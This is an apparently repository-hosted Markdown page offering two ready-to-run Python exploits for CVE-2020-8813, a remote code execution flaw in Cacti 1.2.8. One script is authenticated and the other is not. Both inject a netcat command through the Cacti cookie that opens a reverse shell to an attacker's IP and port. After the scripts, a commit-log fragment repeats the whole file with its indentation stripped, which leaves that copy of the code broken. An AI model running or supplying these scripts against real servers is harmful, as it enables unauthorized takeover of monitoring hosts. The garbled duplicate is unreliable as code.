Penetration_Testing_POC/CVE-2020-8813 - Cacti v1.2.8 RCE.md

## Cacti v1.2.8 authenticated Remote Code Execution (CVE-2020-8813)  

## 简介  

> Cacti是一套基于PHP,MySQL,SNMP及RRDTool开发的网络流量监测图形分析工具。  

## EXP1 需要认证

```python
#!/usr/bin/python3
 
# Exploit Title: Cacti v1.2.8 Remote Code Execution
# Date: 03/02/2020
# Exploit Author: Askar (@mohammadaskar2)
# CVE: CVE-2020-8813
# Vendor Homepage: https://cacti.net/
# Version: v1.2.8
# Tested on: CentOS 7.3 / PHP 7.1.33
 
import requests
import sys
import warnings
from bs4 import BeautifulSoup
from urllib.parse import quote
 
warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
 
 
if len(sys.argv) != 6:
    print("[~] Usage : ./Cacti-exploit.py url username password ip port")
    exit()
 
url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
ip = sys.argv[4]
port = sys.argv[5]
 
def login(token):
    login_info = {
    "login_username": username,
    "login_password": password,
    "action": "login",
    "__csrf_magic": token
    }
    login_request = request.post(url+"/index.php", login_info)
    login_text = login_request.text
    if "Invalid User Name/Password Please Retype" in login_text:
        return False
    else:
        return True
 
def enable_guest(token):
    request_info = {
    "id": "3",
    "section25": "on",
    "section7": "on",
    "tab": "realms",
    "save_component_realm_perms": 1,
    "action": "save",
    "__csrf_magic": token
    }
    enable_request = request.post(url+"/user_admin.php?header=false", request_info)
    if enable_request:
        return True
    else:
        return False
 
def send_exploit():
    payload = ";nc${IFS}-e${IFS}/bin/bash${IFS}%s${IFS}%s" % (ip, port)
    cookies = {'Cacti': quote(payload)}
    requests.get(url+"/graph_realtime.php?action=init", cookies=cookies)
 
request = requests.session()
print("[+]Retrieving login CSRF token")
page = request.get(url+"/index.php")
html_content = page.text
soup = BeautifulSoup(html_content, "html5lib")
token = soup.findAll('input')[0].get("value")
if token:
    print("[+]Token Found : %s" % token)
    print("[+]Sending creds ..")
    login_status = login(token)
    if login_status:
        print("[+]Successfully LoggedIn")
        print("[+]Retrieving CSRF token ..")
        page = request.get(url+"/user_admin.php?action=user_edit&id=3&tab=realms")
        html_content = page.text
        soup = BeautifulSoup(html_content, "html5lib")
        token = soup.findAll('input')[1].get("value")
        if token:
            print("[+]Making some noise ..")
            guest_realtime = enable_guest(token)
            if guest_realtime:
                print("[+]Sending malicous request, check your nc ;)")
                send_exploit()
            else:
                print("[-]Error while activating the malicous account")
 
        else:
            print("[-] Unable to retrieve CSRF token from admin page!")
            exit()
 
    else:
        print("[-]Cannot Login!")
else:
    print("[-] Unable to retrieve CSRF token!")
    exit()
```

> Usage:
> ![](./img/cacti-final-exploit-code.png)


## EXP2 开启来宾实时图查看权限则不需要认证   

```python
#!/usr/bin/python3
 
# Exploit Title: Cacti v1.2.8 Unauthenticated Remote Code Execution
# Date: 03/02/2020
# Exploit Author: Askar (@mohammadaskar2)
# CVE: CVE-2020-8813
# Vendor Homepage: https://cacti.net/
# Version: v1.2.8
# Tested on: CentOS 7.3 / PHP 7.1.33
 
import requests
import sys
import warnings
from bs4 import BeautifulSoup
from urllib.parse import quote
 
warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
 
 
if len(sys.argv) != 4:
    print("[~] Usage : ./Cacti-exploit.py url ip port")
    exit()
 
url = sys.argv[1]
ip = sys.argv[2]
port = sys.argv[3]
 
def send_exploit(url):
    payload = ";nc${IFS}-e${IFS}/bin/bash${IFS}%s${IFS}%s" % (ip, port)
    cookies = {'Cacti': quote(payload)}
    path = url+"/graph_realtime.php?action=init"
    req = requests.get(path)
    if req.status_code == 200 and "poller_realtime.php" in req.text:
        print("[+] File Found and Guest is enabled!")
        print("[+] Sending malicous request, check your nc ;)")
        requests.get(path, cookies=cookies)
    else:
        print("[+] Error while requesting the file!")
 
send_exploit(url)
```
> Usage:
> ![](./img/Cacti-Pre-Auth.png)  

## 详细分析以及来源:https://shells.systems/cacti-v1-2-8-authenticated-remote-code-execution-cve-2020-8813/
add CVE-2020-8813-Cacti v1.2.8 RCE远程代码执行 EXP以及分析 2020-02-22 12:54:14 +08:00			`## Cacti v1.2.8 authenticated Remote Code Execution (CVE-2020-8813)`

			`## 简介`

			`> Cacti是一套基于PHP,MySQL,SNMP及RRDTool开发的网络流量监测图形分析工具。`

			`## EXP1 需要认证`

			```python
			`#!/usr/bin/python3`

			`# Exploit Title: Cacti v1.2.8 Remote Code Execution`
			`# Date: 03/02/2020`
			`# Exploit Author: Askar (@mohammadaskar2)`
			`# CVE: CVE-2020-8813`
			`# Vendor Homepage: https://cacti.net/`
			`# Version: v1.2.8`
			`# Tested on: CentOS 7.3 / PHP 7.1.33`

			`import requests`
			`import sys`
			`import warnings`
			`from bs4 import BeautifulSoup`
			`from urllib.parse import quote`

			`warnings.filterwarnings("ignore", category=UserWarning, module='bs4')`


			`if len(sys.argv) != 6:`
			`print("[~] Usage : ./Cacti-exploit.py url username password ip port")`
			`exit()`

			`url = sys.argv[1]`
			`username = sys.argv[2]`
			`password = sys.argv[3]`
			`ip = sys.argv[4]`
			`port = sys.argv[5]`

			`def login(token):`
			`login_info = {`
			`"login_username": username,`
			`"login_password": password,`
			`"action": "login",`
			`"__csrf_magic": token`
			`}`
			`login_request = request.post(url+"/index.php", login_info)`
			`login_text = login_request.text`
			`if "Invalid User Name/Password Please Retype" in login_text:`
			`return False`
			`else:`
			`return True`

			`def enable_guest(token):`
			`request_info = {`
			`"id": "3",`
			`"section25": "on",`
			`"section7": "on",`
			`"tab": "realms",`
			`"save_component_realm_perms": 1,`
			`"action": "save",`
			`"__csrf_magic": token`
			`}`
			`enable_request = request.post(url+"/user_admin.php?header=false", request_info)`
			`if enable_request:`
			`return True`
			`else:`
			`return False`

			`def send_exploit():`
			`payload = ";nc${IFS}-e${IFS}/bin/bash${IFS}%s${IFS}%s" % (ip, port)`
			`cookies = {'Cacti': quote(payload)}`
			`requests.get(url+"/graph_realtime.php?action=init", cookies=cookies)`

			`request = requests.session()`
			`print("[+]Retrieving login CSRF token")`
			`page = request.get(url+"/index.php")`
			`html_content = page.text`
			`soup = BeautifulSoup(html_content, "html5lib")`
			`token = soup.findAll('input')[0].get("value")`
			`if token:`
			`print("[+]Token Found : %s" % token)`
			`print("[+]Sending creds ..")`
			`login_status = login(token)`
			`if login_status:`
			`print("[+]Successfully LoggedIn")`
			`print("[+]Retrieving CSRF token ..")`
			`page = request.get(url+"/user_admin.php?action=user_edit&id=3&tab=realms")`
			`html_content = page.text`
			`soup = BeautifulSoup(html_content, "html5lib")`
			`token = soup.findAll('input')[1].get("value")`
			`if token:`
			`print("[+]Making some noise ..")`
			`guest_realtime = enable_guest(token)`
			`if guest_realtime:`
			`print("[+]Sending malicous request, check your nc ;)")`
			`send_exploit()`
			`else:`
			`print("[-]Error while activating the malicous account")`

			`else:`
			`print("[-] Unable to retrieve CSRF token from admin page!")`
			`exit()`

			`else:`
			`print("[-]Cannot Login!")`
			`else:`
			`print("[-] Unable to retrieve CSRF token!")`
			`exit()`
			```

			`> Usage:`
			`> ![](./img/cacti-final-exploit-code.png)`


			`## EXP2 开启来宾实时图查看权限则不需要认证`

			```python
			`#!/usr/bin/python3`

			`# Exploit Title: Cacti v1.2.8 Unauthenticated Remote Code Execution`
			`# Date: 03/02/2020`
			`# Exploit Author: Askar (@mohammadaskar2)`
			`# CVE: CVE-2020-8813`
			`# Vendor Homepage: https://cacti.net/`
			`# Version: v1.2.8`
			`# Tested on: CentOS 7.3 / PHP 7.1.33`

			`import requests`
			`import sys`
			`import warnings`
			`from bs4 import BeautifulSoup`
			`from urllib.parse import quote`

			`warnings.filterwarnings("ignore", category=UserWarning, module='bs4')`


			`if len(sys.argv) != 4:`
			`print("[~] Usage : ./Cacti-exploit.py url ip port")`
			`exit()`

			`url = sys.argv[1]`
			`ip = sys.argv[2]`
			`port = sys.argv[3]`

			`def send_exploit(url):`
			`payload = ";nc${IFS}-e${IFS}/bin/bash${IFS}%s${IFS}%s" % (ip, port)`
			`cookies = {'Cacti': quote(payload)}`
			`path = url+"/graph_realtime.php?action=init"`
			`req = requests.get(path)`
			`if req.status_code == 200 and "poller_realtime.php" in req.text:`
			`print("[+] File Found and Guest is enabled!")`
			`print("[+] Sending malicous request, check your nc ;)")`
			`requests.get(path, cookies=cookies)`
			`else:`
			`print("[+] Error while requesting the file!")`

			`send_exploit(url)`
			```
			`> Usage:`
			`> ![](./img/Cacti-Pre-Auth.png)`

			`## 详细分析以及来源:https://shells.systems/cacti-v1-2-8-authenticated-remote-code-execution-cve-2020-8813/`